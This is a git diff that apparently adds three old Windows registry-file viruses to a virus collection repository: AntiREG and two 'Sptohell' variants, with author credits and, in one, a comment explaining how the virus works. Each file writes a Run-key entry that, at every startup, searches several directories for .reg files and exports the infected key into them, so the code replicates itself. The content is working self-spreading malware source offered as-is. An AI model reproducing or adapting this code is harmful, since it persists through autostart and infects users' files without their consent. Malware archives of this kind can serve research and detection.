diff --git a/Other/Virus.WinREG.Antireg.b b/Other/Virus.WinREG.Antireg.b new file mode 100644 index 00000000..02fe7cfd --- /dev/null +++ b/Other/Virus.WinREG.Antireg.b @@ -0,0 +1,13 @@ +REGEDIT4 + +;;-------------------------------;; +;; ;; +;; AntiREG (The First REG Virus) ;; +;; Coded By Lys Kovick ;; +;; Special Thanks To Phage ;; +;; ;; +;;-------------------------------;; + +[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] +@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + diff --git a/Other/Virus.WinREG.Sptohell b/Other/Virus.WinREG.Sptohell new file mode 100644 index 00000000..c7b96c44 --- /dev/null +++ b/Other/Virus.WinREG.Sptohell @@ -0,0 +1,24 @@ +REGEDIT 4 + +;; WinREG.Wow +;; written by SeCoNd PaRt To HeLl +;; for my Virus Database + +[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] +@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + +;; Wow +;; WowWow +;; WowWowWow +;; WowWowWowWow +;; WowWowWowWowWow +;; WowWowWowWowWowWow +;; WowWowWowWowWowWowWow +;; WowWowWowWowWowWowWowWow +;; WowWowWowWowWowWowWow +;; WowWowWowWowWowWow +;; WowWowWowWowWow +;; WowWowWowWow +;; WowWowWow +;; WowWow +;; Wow \ No newline at end of file diff --git a/Other/Virus.WinREG.Sptohell.b b/Other/Virus.WinREG.Sptohell.b new file mode 100644 index 00000000..c2fca8c0 --- /dev/null +++ b/Other/Virus.WinREG.Sptohell.b @@ -0,0 +1,14 @@ +REGEDIT 4 + +;; *************** --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <-- *************** +;; +;; You may ask: "Why do I write such an nonsence virus?"! +fg+ The reason is, that I have nerver seen such an virus +;; in any ezine before. And I think, much ppl don't know, that such viruses exist. +;; +;; The virus itself is fuckin easy. First it copies itself to the Registry, so the code will started by every +;; start of the computer. The code searchs for every *.reg file in 4 directories. If it finds some, it copies +;; itself (the code in the registry) to these .REG-files. + + +[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] +@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" \ No newline at end of file